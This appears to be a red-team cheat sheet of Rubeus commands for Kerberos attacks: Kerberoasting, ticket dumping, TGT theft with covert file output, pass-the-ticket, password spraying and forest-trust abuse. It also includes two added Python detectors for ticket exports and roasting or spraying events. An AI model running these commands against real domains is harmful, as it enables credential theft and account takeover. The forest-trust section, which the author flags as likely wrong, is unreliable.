Rubeus.exe
Rubeus is wonderful for playing with hashes and Kerberos tickets.
Kerberoasting attack
rubeus.exe kerberoast /simple /outfile:kerberoast.txt
Dump tickets
rubeus.exe dump /service:krbtgt /nowrap
Monitor mode
This is handy when you're WinRM'd into a box with local/domain admin creds and you want to steal other TGTs:
rubeus monitor /interval:5 /nowrap /runfor:60 /registry:SOFTWARE\MONITOR
Monitor mode - save to disk
If for some reason the TGTs won't write to registry, try this to write to disk:
rubeus monitor /interval:5 /nowrap /runfor:60 /consoleoutfile:c:\users\public\some-innocent-looking-file.log
Extracting TGTs from registry hives after monitor mode attack
Once you've done the monitor "attack" and captured TGTs to the registry, use reg.exe to extract them.
Grab the TGTs from registry
reg export HKLM\SOFTWARE\MONITOR backup1.reg
Once you have the TGTs, use something like rubeus2ccache to convert them to kirbi or ccache (reference). Then you can use rubeus to pass the TGT.
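On the blue-team side, a registry key holding exported tickets is exactly the artifact to hunt for after the fact. The following is an added example (not from the original notes and not Rubeus's own code) that parses a reg.exe export and flags any string or binary value that decodes to a KRB-CRED structure, the DER format a .kirbi ticket is stored in. The key and value names under SOFTWARE\MONITOR in the sample are constructed, not Rubeus's real layout; the match relies only on the encoding (RFC 4120 assigns KRB-CRED the [APPLICATION 22] tag, DER byte 0x76, which is why base64 tickets begin with "doI"), and a real export must be read as UTF-16 before being handed to the function.

```python
"""Hunt a reg.exe export for values that hold Kerberos KRB-CRED blobs.
Added example; the SOFTWARE\\MONITOR layout below is constructed and the
detection relies only on the DER framing, not on key or value names."""
import base64
import binascii
import re

# Constructed stand-in for a ticket: correct KRB-CRED tag (0x76) and DER
# long-form length (0x82 0x00 0x10 = 16 payload bytes), zero-filled payload.
FAKE_KRB_CRED = b"\x76\x82\x00\x10" + b"\x30\x0e" + b"\x00" * 14

# Constructed export text.  A real `reg export` file is UTF-16LE with a BOM:
# open(path, encoding="utf-16").read() before calling find_ticket_blobs().
SAMPLE_REG = f"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\MONITOR]
"Description"="nothing to see here"

[HKEY_LOCAL_MACHINE\\SOFTWARE\\MONITOR\\CORP\\jdoe]
"Ticket"="{base64.b64encode(FAKE_KRB_CRED).decode()}"
"Captured"="2024-05-01 10:00:05"

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Contoso\\App]
"Blob"=hex:01,02,03,04
"""


def _der_length(data: bytes):
    """Return (declared_length, header_size) for a DER TLV, or None if malformed."""
    if len(data) < 2:
        return None
    first = data[1]
    if first < 0x80:                      # short form: one length octet
        return first, 2
    n = first & 0x7F                      # long form: n following octets
    if n == 0 or n > 4 or len(data) < 2 + n:
        return None
    return int.from_bytes(data[2:2 + n], "big"), 2 + n


def _looks_like_krb_cred(data: bytes) -> bool:
    """True when data is a single DER TLV tagged [APPLICATION 22] (KRB-CRED)."""
    if not data or data[0] != 0x76:
        return False
    parsed = _der_length(data)
    return parsed is not None and parsed[0] + parsed[1] == len(data)


def parse_reg_export(text: str):
    """Yield (key, value_name, kind, value) for REG_SZ ("sz") and hex ("hex") values."""
    key = None
    # hex(...) values wrap with a trailing backslash; join them back together.
    joined = re.sub(r",\\\r?\n\s*", ",", text)
    for raw in joined.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = re.match(r'^(?:"(.*?)"|(@))=(.*)$', line)
        if not m or key is None:
            continue
        name = m.group(1) if m.group(1) is not None else "(Default)"
        val = m.group(3)
        if val.startswith('"') and val.endswith('"'):
            yield key, name, "sz", val[1:-1].replace('\\\\', '\\').replace('\\"', '"')
        elif val.startswith("hex"):        # hex:, hex(2):, hex(7): ...
            yield key, name, "hex", bytes.fromhex(val.split(":", 1)[1].replace(",", ""))


def find_ticket_blobs(reg_text: str):
    """Return [(key, value_name, decoded_size)] for every value that is a KRB-CRED."""
    hits = []
    for key, name, kind, value in parse_reg_export(reg_text):
        if kind == "sz":
            try:
                data = base64.b64decode(value, validate=True)
            except (binascii.Error, ValueError):
                continue                   # ordinary string, not base64
        else:
            data = value
        if _looks_like_krb_cred(data):
            hits.append((key, name, len(data)))
    return hits


if __name__ == "__main__":
    for key, name, size in find_ticket_blobs(SAMPLE_REG):
        print(f"KRB-CRED blob: {key}\\{name} ({size} bytes)")
```

The length check matters: a random base64 value whose first byte happens to be 0x76 is rejected unless its DER length field accounts for exactly the remaining bytes, which is what a real ticket export satisfies.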
Pass-the-ticket
rubeus.exe ptt /ticket:xxx
Password spraying
rubeus.exe spray /password:MySprayedPass2024! /domain:domain.com /dc:1.2.3.4 /outfile:successful-sprays.txt
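From the defender's side, both kerberoast and spray leave a distinctive pattern in the domain controller's Security log: Kerberoasting is one principal requesting RC4 (encryption type 0x17) service tickets for many SPNs in a short time (Event ID 4769), and a spray is one source failing Kerberos pre-authentication (Event ID 4771, failure code 0x18) against many distinct accounts. The following is an added example, not part of the original notes, that runs those two heuristics over constructed records; the simplified field names (account, client_ip, service, etype, failure) and the thresholds are assumptions, not any product's schema.

```python
"""Detection heuristics for the activity kerberoast and spray produce on a DC,
run over constructed Security-log records.  Added example; every record is
made up and the field names are simplified forms of the 4769 / 4771 fields."""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_EVENTS = [
    # 4769 = service ticket requested.  Roasting looks like one account, from
    # one host, pulling RC4 (etype 0x17) tickets for several SPNs quickly.
    {"id": 4769, "time": "2024-05-01T10:00:01", "account": "jdoe", "client_ip": "10.0.0.5",
     "service": "MSSQLSvc/db01.corp.local:1433", "etype": "0x17"},
    {"id": 4769, "time": "2024-05-01T10:00:02", "account": "jdoe", "client_ip": "10.0.0.5",
     "service": "HTTP/intranet.corp.local", "etype": "0x17"},
    {"id": 4769, "time": "2024-05-01T10:00:02", "account": "jdoe", "client_ip": "10.0.0.5",
     "service": "svc_backup", "etype": "0x17"},
    # AES (0x12) ticket for a machine account: routine share access, ignored.
    {"id": 4769, "time": "2024-05-01T10:00:03", "account": "jdoe", "client_ip": "10.0.0.5",
     "service": "FS01$", "etype": "0x12"},
    # A single RC4 ticket from a legacy client stays below the threshold.
    {"id": 4769, "time": "2024-05-01T10:00:04", "account": "asmith", "client_ip": "10.0.0.6",
     "service": "MSSQLSvc/db01.corp.local:1433", "etype": "0x17"},
    # 4771 = pre-authentication failed.  A spray is one source trying many
    # distinct accounts with failure code 0x18 (wrong password).
    {"id": 4771, "time": "2024-05-01T11:00:00", "account": "asmith", "client_ip": "10.0.0.9", "failure": "0x18"},
    {"id": 4771, "time": "2024-05-01T11:00:02", "account": "bjones", "client_ip": "10.0.0.9", "failure": "0x18"},
    {"id": 4771, "time": "2024-05-01T11:00:04", "account": "cwu", "client_ip": "10.0.0.9", "failure": "0x18"},
    {"id": 4771, "time": "2024-05-01T11:00:06", "account": "dlee", "client_ip": "10.0.0.9", "failure": "0x18"},
    {"id": 4771, "time": "2024-05-01T11:00:08", "account": "efox", "client_ip": "10.0.0.9", "failure": "0x18"},
    # 0x19 (pre-auth required) is not a password guess and must not count.
    {"id": 4771, "time": "2024-05-01T11:00:10", "account": "zeta", "client_ip": "10.0.0.9", "failure": "0x19"},
    # One user mistyping their own password three times is not a spray.
    {"id": 4771, "time": "2024-05-01T11:05:00", "account": "bjones", "client_ip": "10.0.0.7", "failure": "0x18"},
    {"id": 4771, "time": "2024-05-01T11:05:05", "account": "bjones", "client_ip": "10.0.0.7", "failure": "0x18"},
    {"id": 4771, "time": "2024-05-01T11:05:09", "account": "bjones", "client_ip": "10.0.0.7", "failure": "0x18"},
]


def _windowed_distinct(rows, window, threshold):
    """rows: list of (datetime, item).  Return the largest set of distinct items
    seen inside any span of length `window` if it reaches `threshold`, else None."""
    rows.sort(key=lambda r: r[0])
    best, j = set(), 0
    for i in range(len(rows)):
        while j < len(rows) and rows[j][0] - rows[i][0] <= window:
            j += 1
        items = {item for _, item in rows[i:j]}
        if len(items) > len(best):
            best = items
    return sorted(best) if len(best) >= threshold else None


def find_kerberoasting(events, window=timedelta(minutes=5), min_services=3):
    """Map (account, client_ip) -> SPNs when one principal pulled RC4 service
    tickets for at least `min_services` distinct non-machine accounts in `window`."""
    buckets = defaultdict(list)
    for ev in events:
        if ev["id"] != 4769 or ev["etype"].lower() != "0x17":
            continue
        svc = ev["service"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue                       # machine accounts and TGT renewals are routine
        buckets[(ev["account"], ev["client_ip"])].append((datetime.fromisoformat(ev["time"]), svc))
    return {k: v for k, rows in buckets.items() if (v := _windowed_distinct(rows, window, min_services))}


def find_password_spray(events, window=timedelta(minutes=10), min_accounts=5):
    """Map client_ip -> accounts when one source failed pre-auth (0x18) for at
    least `min_accounts` distinct accounts in `window`."""
    buckets = defaultdict(list)
    for ev in events:
        if ev["id"] != 4771 or ev["failure"].lower() != "0x18":
            continue
        buckets[ev["client_ip"]].append((datetime.fromisoformat(ev["time"]), ev["account"]))
    return {k: v for k, rows in buckets.items() if (v := _windowed_distinct(rows, window, min_accounts))}


if __name__ == "__main__":
    for (account, ip), spns in find_kerberoasting(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting by {account} from {ip}: {spns}")
    for ip, accounts in find_password_spray(SAMPLE_EVENTS).items():
        print(f"possible password spray from {ip}: {accounts}")
```

Both rules key on distinct targets rather than raw counts, which is what separates a spray from one user's mistyped password and a roast from a chatty legacy application; in a real deployment the RC4 filter also needs an allow-list for the SPNs that genuinely cannot do AES.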
Request a TGT
rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap
Note: if doing asktgt for a domain controller (a machine account), be sure to use the trailing dollar sign, e.g. DC01$.
Request a TGT when abusing forest trusts [ UNDER REVIEW ]
I was working on this in a lab and don't think this section below is right, so ignore it until further review.
If you're in a situation where you've got DA on DOMAIN2.COM and want to abuse that to pwn DOMAIN1.COM, and you've extracted domain SIDs with get-adobject and you've extracted trust keys with mimikatz, you can do something like this to request a TGT for the pwned domain:
rubeus.exe asktgt /user:domain2$ /domain:domain1.com /rc4:THE-rc4_hmac_nt-YOU-EXTRACTED-WITH-MIMIKATZ /nowrap
Describe a ticket
rubeus.exe describe /ticket:base64ticket
This came in real handy during an engagement where I had lifted a TGT from a system and was trying to pass it and use it and was getting all sorts of errors. When I ran the describe command, the output said KeyType=180, which I learned means Credential Guard is in place and that ticket won't work anywhere else but the box it came from!